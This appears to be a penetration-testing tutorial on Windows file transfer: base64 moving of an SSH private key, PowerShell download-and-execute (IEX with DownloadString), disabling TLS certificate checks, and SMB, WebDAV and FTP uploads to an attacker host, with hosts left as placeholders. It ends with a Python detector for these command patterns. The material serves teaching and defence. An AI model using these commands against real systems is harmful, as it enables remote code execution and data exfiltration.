Windows File Transfer Methods

Introduction

Windows provides various native utilities for file transfer operations. Understanding these methods is important for both attackers (to operate and evade detection) and defenders (to monitor and create policies).

Fileless attacks use legitimate built-in tools to carry out an attack without dropping files to disk. The Astaroth APT attack documented by Microsoft demonstrates this: it used WMIC, Bitsadmin, Certutil, and Regsvr32 to download, decode, and execute payloads in memory.

Download Operations

PowerShell Base64 Encode & Decode

For small files, encode the file on the attacker machine, copy the resulting string, and decode it on the target. Verify integrity by comparing MD5 checksums on both sides.

On attacker machine:

md5sum id_rsa
cat id_rsa |base64 -w 0;echo

On Windows target:

[IO.File]::WriteAllBytes("C:\Users\Public\id_rsa", [Convert]::FromBase64String("<base64_string>"))
Get-FileHash C:\Users\Public\id_rsa -Algorithm md5

Limitations: Windows cmd.exe has a maximum string length of 8,191 characters, and web shells may error on very large strings.

PowerShell Web Downloads

Most companies allow HTTP/HTTPS outbound traffic. PowerShell’s System.Net.WebClient class provides multiple download methods:

| Method | Description |
| --- | --- |
| DownloadFile | Downloads to local file |
| DownloadFileAsync | Async version of DownloadFile |
| DownloadString | Downloads as string (for fileless execution) |
| DownloadData | Downloads as byte array |

DownloadFile:

(New-Object Net.WebClient).DownloadFile('<URL>','<Output File>')

DownloadString (Fileless):

IEX (New-Object Net.WebClient).DownloadString('<URL>')
# Or with pipeline:
(New-Object Net.WebClient).DownloadString('<URL>') | IEX

Invoke-WebRequest (PowerShell 3.0+):

Invoke-WebRequest <URL> -OutFile <filename>
# Aliases: iwr, curl, wget

Common Errors & Fixes:

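  1. IE first-launch configuration error: add -UseBasicParsing.
Invoke-WebRequest <URL> -UseBasicParsing | IEX
  2. SSL/TLS certificate trust error: the line below turns off certificate validation for all later requests in the same PowerShell session.
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}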

SMB Downloads

SMB (TCP/445) is common in enterprise Windows networks. Create an SMB server with Impacket:

sudo impacket-smbserver share -smb2support /tmp/smbshare

Download from Windows:

copy \\<IP>\share\<file>

Note: Newer versions of Windows block unauthenticated guest access. Start the server with credentials and mount the share with them:

sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test
net use n: \\<IP>\share /user:test test
copy n:\<file>

FTP Downloads

FTP uses TCP/21 and TCP/20. Set up a Python FTP server with pyftpdlib:

sudo pip3 install pyftpdlib
sudo python3 -m pyftpdlib --port 21

Download with PowerShell:

(New-Object Net.WebClient).DownloadFile('ftp://<IP>/file.txt', 'C:\Users\Public\ftp-file.txt')

Download with FTP client (non-interactive):

echo open <IP> > ftpcommand.txt
echo USER anonymous >> ftpcommand.txt
echo binary >> ftpcommand.txt
echo GET file.txt >> ftpcommand.txt
echo bye >> ftpcommand.txt
ftp -v -n -s:ftpcommand.txt

Upload Operations

PowerShell Base64 Encode & Decode

Encode on Windows:

[Convert]::ToBase64String((Get-Content -path "<file>" -Encoding byte))
Get-FileHash "<file>" -Algorithm MD5 | select Hash

Decode on attacker machine:

echo "<base64_string>" | base64 -d -w 0 > <output_file>
md5sum <output_file>  # Verify hash matches

SMB Uploads

SMB (TCP/445) is often blocked outbound. Use WebDAV (an HTTP/HTTPS extension) as an alternative: Windows will try SMB first, then fall back to HTTP.

Set up a WebDAV server:

sudo pip3 install wsgidav cheroot
sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous

Upload from Windows:

copy <file> \\<IP>\DavWWWRoot\
# Or specify folder:
copy <file> \\<IP>\<sharefolder>\

Note: DavWWWRoot is a special keyword; no actual folder with that name exists on the server. The share can also be mounted with net use if needed.

If SMB is allowed, use Impacket:

sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test

FTP Uploads

Set up an FTP server with write permissions:

sudo python3 -m pyftpdlib --port 21 --write

Upload with PowerShell:

(New-Object Net.WebClient).UploadFile('ftp://<IP>/filename', '<local_file_path>')

Upload with FTP client (non-interactive):

echo open <IP> > ftpcommand.txt
echo USER anonymous >> ftpcommand.txt
echo binary >> ftpcommand.txt
echo PUT <file> >> ftpcommand.txt
echo bye >> ftpcommand.txt
ftp -v -n -s:ftpcommand.txt

Summary

  • Base64: No network needed, limited by terminal length
  • PowerShell WebClient: HTTP/HTTPS, most common, supports fileless execution
  • SMB: Common in enterprise, often blocked outbound (use WebDAV)
  • FTP: Alternative protocol, requires server setup
  • Fileless attacks: Use DownloadString + IEX to execute in memory without touching disk
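
For the defender side mentioned in the introduction, the Python below matches the command shapes shown on this page against logged PowerShell script blocks or process command lines and grades the hits. It is an added example, not part of the original post; the rule names, regexes, host names and sample lines are constructed assumptions, as is the choice of Event ID 4104 and 4688 text as input.

```python
import re

# Rule names and regexes are illustrative assumptions written for this page's
# commands; they are not a vendor or Sigma rule set.
RULES = [
    ("webclient-transfer", re.compile(
        r"\.(DownloadFile(Async)?|DownloadString|DownloadData|UploadFile)\s*\(", re.I)),
    ("fileless-iex", re.compile(
        r"\b(IEX|Invoke-Expression)\b.*DownloadString|"
        r"(DownloadString|Invoke-WebRequest).*\|\s*(IEX|Invoke-Expression)\b", re.I)),
    ("invoke-webrequest", re.compile(r"\b(Invoke-WebRequest|iwr)\b", re.I)),
    ("tls-validation-off", re.compile(
        r"ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}", re.I)),
    ("base64-file-write", re.compile(r"WriteAllBytes\s*\(.*FromBase64String", re.I)),
    ("webdav-unc", re.compile(r"\\\\[^\\\s]+\\DavWWWRoot\b", re.I)),
    ("ftp-script", re.compile(r"\bftp(\.exe)?\b.*\s-s:", re.I)),
]
HIGH = {"fileless-iex", "tls-validation-off"}  # in-memory execution, trust bypass


def classify(text):
    """Return the names of all rules that match one command line or script block."""
    return [name for name, rx in RULES if rx.search(text)]


def triage(events):
    """events: iterable of (host, text). Yield (host, severity, rules) for hits only."""
    for host, text in events:
        hits = classify(text)
        if hits:
            yield host, ("high" if HIGH.intersection(hits) else "medium"), hits


# Constructed sample input, shaped like 4104 ScriptBlockText / 4688 CommandLine values.
SAMPLE = [
    ("ws01", "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')"),
    ("ws02", "(New-Object Net.WebClient).DownloadFile('ftp://192.0.2.10/file.txt', 'C:\\Users\\Public\\ftp-file.txt')"),
    ("ws03", "Invoke-WebRequest http://192.0.2.10/a.ps1 -UseBasicParsing | IEX"),
    ("ws04", "copy report.docx \\\\192.0.2.10\\DavWWWRoot\\"),
    ("ws05", "ftp -v -n -s:ftpcommand.txt"),
    ("ws06", "Get-ChildItem C:\\Users\\Public"),
]

if __name__ == "__main__":
    for host, severity, rules in triage(SAMPLE):
        print(f"{host:5} {severity:6} {','.join(rules)}")
```

String matching like this only sees commands as they were logged, so it depends on script block or command-line logging being enabled and will miss obfuscated variants.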